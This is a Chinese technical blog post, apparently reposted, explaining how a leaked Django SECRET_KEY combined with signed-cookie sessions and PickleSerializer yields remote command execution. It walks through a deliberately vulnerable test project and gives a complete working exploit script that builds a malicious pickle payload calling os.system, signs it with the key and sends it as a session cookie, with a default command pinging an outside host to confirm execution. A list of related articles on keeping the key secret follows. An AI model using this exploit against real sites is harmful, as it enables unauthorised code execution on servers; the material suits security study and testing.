Django的Secret Key泄漏导致的命令执行实践

最新推荐文章于 2024-07-30 06:51:17 发布
最新推荐文章于 2024-07-30 06:51:17 发布
阅读量4.2k 收藏
点赞数
分类专栏: 漏洞列表

http://www.polaris-lab.com/index.php/archives/426/

0x01 Secret Key的用途和泄漏导致的攻击面

Secret Key主要用于加密、签名,下面是官方文档的说明:

The secret key is used for:

  • All sessions if you are using any other session backend thandjango.contrib.sessions.backends.cache, or are using thedefaultget_session_auth_hash().
  • All messages if you are using CookieStorage orFallbackStorage.
  • All PasswordResetView tokens.
  • Any usage of cryptographic signing, unless a different key is provided.

Secret Key泄漏可能的攻击面:

  • 远程代码执行,如果使用了cookie-based sessions。当然其他可以操作session_data的问题都可能导致
  • 任意密码重置,contrib.auth.token.
  • CSRF
  • ...

我们主要关注远程代码执行这个点。

0x02 Django Session的几种方式

  • 数据库(database-backed sessions)

如下图,session的key和data都是存储在sqlite数据库中的,这是默认的设置,当用户带着cookie来请求服务端时,cookie中包含的是session_key,服务端会根据这个session_key来查询数据库,从而获取到session_data。就是说session_data是存在服务端的。

cooke_session.png

  • 缓存(cached sessions)
  • 文件系统(file-based sessions)
  • Cookie(cookie-based sessions)

当Django使用了这种方式的时候,和其它几种方式不同的是,它将session_data也是存在于cookie中的,即存在于客户端的。但它是经过签名的,签名依赖于django 的Secret Key,所以如果我们知道了Secret Key将可能修改session_data。这也是我们将要讨论的重点。

0x03 环境准备

关于通过操作session来实现命令执行有一个很好的案例。在学习Pickle反序列化的时候就看过,其中的关键是Django在取得session_data之后,需要进行反序列化操作才能获取其中的数据。所以,如果能有机会操作session_data,就有可能导致代码执行。

而我们这里关注的是Secret Key泄漏的情况,它有2个关键点:

  1. 使用了cookie-based sessions
  2. 使用了serializers.PickleSerializer

注:Django1.5级以下,session默认是采用pickle执行序列号操作django.contrib.sessions.serializers.PickleSerializer;在1.6 及以上版本默认采用json序列化。django.contrib.sessions.serializers.JSONSerializer

Djgano测试环境部署:

#命令行下运行如下命令来创建项目
django-admin startproject testproject

#在项目中创建应用
cd testproject
python manage.py startapp testapp

#在setting.py中新增SESSION_ENGINE和SESSION_SERIALIZER配置。这是漏洞存在的必要条件!
SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies'
#SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
#因为我的环境中使用的Django1.11,默认使用的是JSONSerializer,所以需要配置这一条。

urls.py的内容如下:

from django.conf.urls import url
from django.contrib import admin
from testapp import views

urlpatterns = [
    url(r'.*$', views.index),
    url(r'^admin/', admin.site.urls),
]

views.py中的内容如下:

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.shortcuts import render
from django.http import HttpResponse

# Create your views here.
def index(request):
    x= request.session
    print x.values
    print dir(x)
    print x.serializer
    print x['userid'] #这一句是关键,需要有尝试从session中取数据的行为,django才会去执行反序列
    return HttpResponse(x)

注意:必须要有尝试从session中取数据的行为,Django才会去执行反序列,否则将不能触发!所以实际的环境中,最好选择用户信息相关接口等一定会取数据的接口进行测试。

以上就完成了环境的准备,运行python manage.py runserver启动服务。

0x04 PoC及验证

关于Pickle PoC的生成方法,可以参考我之前的文章Python Pickle的任意代码执行漏洞实践和Payload构造

poc.py的内容如下:

# !/usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'bit4'
__github__ = 'https://github.com/bit4woo'

import os
import requests
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
import pickle

def session_gen(SECRET_KEY,command = 'ping -n 3 test.0y0.link || ping -c test.0y0.link',):
    class Run(object):
        def __reduce__(self):
            #return (os.system,('ping test.0y0.link',))
            return (os.system,(command,))

    #SECRET_KEY = '1bb8)i&dl9c5=npkp248gl&aji7^x6izh3!itsmb6&yl!fak&f'
    SECRET_KEY = SECRET_KEY

    sess = signing.dumps(Run(), key = SECRET_KEY,serializer=PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
    #生成的恶意session
    print sess


    '''
    salt='django.contrib.sessions.backends.signed_cookies'
    sess = pickle.dumps(Run())
    sess = signing.b64_encode(sess)#通过跟踪signing.dumps函数可以知道pickle.dumps后的数据还经过了如下处理。
    sess = signing.TimestampSigner(key=SECRET_KEY, salt=salt).sign(sess)
    print sess
    #这里生成的session也是可以成功利用的,这样写只是为了理解signing.dumps。
    '''

    session = 'sessionid={0}'.format(sess)
    return session

def exp(url,SECRET_KEY,command):

    headers = {'Cookie':session_gen(SECRET_KEY,command)}
    proxy = {"http":"http://127.0.0.1:8080"}#设置为burp的代理方便观察请求包
    response = requests.get(url,headers= headers,proxies = proxy)
    #print response.content

if __name__ == '__main__':
    url = 'http://127.0.0.1:8000/'
    SECRET_KEY = '1bb8)i&dl9c5=npkp248gl&aji7^x6izh3!itsmb6&yl!fak&f'
    command = 'ping -n 3 test.0y0.link || ping -c test.0y0.link'
    exp(url,SECRET_KEY,command)

运行poc.py时,后台的输出结果:

success.png

print x['userid']对应了2个动作,一是反序列化,也就是执行系统命令的关键;二是取值,这里是取值失败打印了错误信息,但是这已经不重要了,因为我们已经实现了我们的目的。

PoC脚本最好使用原生的库或者方法来进行其中的payload生成操作。比如上面的poc.py中,可以使用signing.dumps,也可单独使用pickle.dumps然后加上其他操作,但是最好使用第一种,这样可以很好地保证Payload的正确性。而且实际的环境中,如果能获取到目标的具体版本,最好通过配置相应版本的环境来完成PoC的生成。

本文环境和代码的下载地址:


PD_3569
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python - Django 框架 - 设置SECRET_KEY
学无止境
07-13 3168
请确保将’your-secret-key’替换为自己的实际密钥。这种方法简单直接,但在版本控制系统中共享代码时存在风险,因为密钥可以被他人看到。
浅谈Django+Gunicorn+Nginx部署之路
09-18
设置SECRET_KEY是为了保证网站的安全性,防止敏感数据泄露。 静态资源的收集和配置是部署过程中的另一个关键步骤。在开发环境中,Django会自动为每个请求收集静态文件,但在生产环境中,我们需要手动收集静态文件到...
DjangoSECTET_KEY到代码执行
Fly_鹏程万里
03-18 516
背景 最近审查代码发现某些产品在登录的JS代码中泄露了SECRET_KEY,将该值作为密码加密的盐,这样就暴露了加密salt不太好吧,更重要的是对django的安全造成了极大的威胁。 SECRET_KEY作用 SECTET_KEY在djanog中使用非常广泛,基本上涉及到安全,加密等的地方都用到了,下面列举一些常见情景: 1,json object的签名 2,加密函数,如密码重置,表单,评论...
Django任意URL跳转漏洞(CVE-2018-14574)
qq_68163788的博客
07-01 768
Django 最初被设计用于具有快速开发需求的新闻类站点,目的是要实现简单快捷的网站开发。以下内容简要介绍了如何使用 Django 实现一个数据库驱动的网络应用。Django默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中。 (由配置项中的django.middleware.common.CommonMiddleware、APPEND_SLASH来决定)。 在path开头为//example.com的情况下,Django没做处理,导致浏览器认
Django项目SECRET_KEY等敏感信息保存
weixin_34360651的博客
02-25 749
在我们做完django项目后,向生产环境部署时,为了避免一些敏感信息被有心人利用,我们应该将其保护起来,比如说在settings配置中的一些密码等内容存在操作系统内,通过调用来使用,比如下面这种做法: 拿Django中的SECRET_KEY来说吧,其余如同数据库密码、邮箱密码等秘密内容都可以使用这种方式将其贮存在操作系统中。我使用的是python语言,这里要使用到python的os内置模块: ...
djangoSECRET_KEY到代码执行
weixin_34006468的博客
03-08 2598
xxlegend · 2015/09/08 18:290x00 背景最近审查代码发现某些产品在登录的JS代码中泄露了SECRET_KEY,将该值作为密码加密的盐,这样就暴露了加密salt不太好吧,更重要的是对django的安全造成了极大的威胁。0x01 SECRET_KEY作用SECTET_KEY在djanog中使用非常广泛,基本上涉及到安全,加密等的地方都用到了,下面列举一些常见情景:1,jso...
[yinna/AutoTestPlantform] Django Secret Key exposed on GitHub
dream_na的博客
01-18 666
现在网络安全,每个公司都挺重视的,所以当我收到这封邮件时,理所当然的吓一跳,赶紧网上查询相关信息 GitGuardianGitHub 敏感信息泄露自动提示平台,也是首个实时,自动扫描开源项目代码的平台。当发布敏感资料到 Github 开源项目时,它就会自动提醒我们,比如说发送电子邮件。 主要原因就是:代码中上传了某些密码 而我们大部分用户都是一个密码可能串通好几个平台,所以很有可能被攻击、挖矿等 于是赶紧把账号密码去掉,可是提交记录的过程大家还是能看到之前上传的密码 于是乎,我在想有没有可以删除所有提
16、部署Django项目_opt1
08-04
5. **设置SECRET_KEY**:在生产环境中,不要在代码中硬编码`SECRET_KEY`,而应将其存储在环境变量中。这样可以增加安全性,避免敏感信息泄露。 6. **安全配置**:启用HTTPS以提供加密通信,使用SSL/TLS证书。设置...
Django 项目通过加载不同env文件来区分不同环境
09-17
在运行Django命令时,你可以通过设置`PROJECT_ENV`环境变量来指定当前环境,比如: ```bash PROJECT_ENV=local python manage.py runserver ``` 你还可以在启动脚本、shell配置或服务管理器(如`supervisord`或`...
Python库 | django-environ-0.3.0.tar.gz
03-02
SECRET_KEY = env.str('SECRET_KEY') DEBUG = env.bool('DEBUG', default=False) ``` 此外,django-environ还提供了一个方便的`read_env`方法,可以从`.env`文件中读取环境变量。这个文件不应当被版本控制系统追踪...
Python库 | social-auth-app-django-1.0.0.tar.gz
03-10
《Python库Social-Auth-App-Django:深度解析与应用》 在Python的世界里,库是开发者们不可或缺的工具,它们极大地丰富了Python的功能并提高了开发效率。今天我们要深入探讨的是一个名为`social-auth-app-django`的...
gg-shield:检测源代码中的秘密,扫描您的存储库以查找泄漏。 使用GitGuardian查找机密并防止凭据泄漏GitGuardian是自动机密检测和修复服务
02-04
:使用GitGuardian保护您的秘密 GitGuardian防护(gg-shield)是一个CLI应用程序,可在您的本地环境或CI环境中运行,以帮助您检测200多种类型的机密以及其他潜在的安全漏洞或策略中断。 GitGuardian防护罩通过使用我们的来扫描文件并检测代码中的潜在机密。 的/v1/scan端点是无状态的。 我们不会存储您正在发送的任何文件或我们检测到的任何秘密。 您还可以通过存储库上的框架使用gg-shield,或者作为全局或本地独立的pre-commit。 您需要的API密钥才能使用gg-shield。 将API密钥添加到您的环境变量中: GITGUARDIA
django setting.py中的SECRET_KEY
西京刀客
09-19 2409
当您使用 创建一个新的 Django 项目startproject时,该 settings.py文件会自动生成并获取一个随机 SECRET_KEY值。该值是保护签名数据的关键——确保其安全至关重要,否则攻击者可以使用它来生成自己的签名值。
Django设置SECRET_KEY
Pert的博客
11-02 3463
在我们做完django项目后,向生产环境部署时,为了避免一些敏感信息被有心人利用,我们应该将其保护起来,比如说在settings配置中的一些密码等内容存在操作系统内,通过调用来使用,比如下面这种做法: 拿Django中的SECRET_KEY来说吧,其余如同数据库密码、邮箱密码等秘密内容都可以使用这种方式将其贮存在操作系统中。我使用的是python语言,这里要使用到python的os内置模块: os模块**:官方定义:This module provides a portable way of using.
Django调用SECRET_KEY对数据进行加密
几许的博客
05-07 472
Django中进行加密可以直接调用django配置文件中的SECRET_KEY , 同时还需要导入itsdangerous模块中的TimedJSONWebSignatureSerializer进行加密。当用户点击邮箱发送的链接会像服务器发送一个请求。
Djangosecret_key添加到环境变量
RayMand168的博客
12-09 709
通常有一个单独的 settings.py 文件用于生产环境,并从单独的文件或环境变量,导入敏感设置。即使其他源代码在公共存储库中可用,也应保护此文件。
Django:配置不当:SECRET_KEY 设置不能为空
最新发布
wangbadan121的专栏
07-30 281
python
Django-加密签名
adminwg的博客
10-02 1237
Django-加密签名 web应用程序安全的黄金法则是永远不要信任来自不可信来源的数据。有时,通过不受信任的介质传递数据会很有用。加密签名的值可以通过不受信任的通道安全传递,只要知道将检测到任何篡改。 Django既提供了用于签名值的低级API,也提供了用于设置和读取签名Cookie的高级API,这是web应用程序中最常见的签名用途之一。
携程apollo 安装部署
0123456789
01-23 1342
下载 下载 https://github.com/nobodyiam/apollo-build-scripts 目录中有 sql 文件夹 在本地新建2个数据库,名字和sql文件一样,也可以自定,改一下sql对应的名字即可,新建好之后,分别导入sql到相应数据库 导入不了解参考 https://blog.csdn.net/fengchen0123456789/article/details/7869...
django如何向虚拟机发送远程执行命令
06-08
要向虚拟机发送远程执行命令,你可以使用 Paramiko 库实现 SSH 连接,这样就可以像在本地执行命令一样在远程虚拟机上执行命令了。下面是一个简单的示例代码: ```python import paramiko # 连接虚拟机 ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect('虚拟机IP地址', port=22, username='用户名', password='密码') # 执行命令 stdin, stdout, stderr = ssh.exec_command('要执行命令') print(stdout.read().decode()) # 关闭连接 ssh.close() ``` 在这个示例中,我们首先使用 Paramiko 库建立 SSH 连接。然后,我们使用 `exec_command` 方法在远程虚拟机上执行命令,并获取命令的输出。最后,我们关闭连接。 需要注意的是,为了确保连接的安全,你需要在虚拟机上配置 SSH 服务,并设置相应的安全策略,例如禁止密码登录、使用密钥认证等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值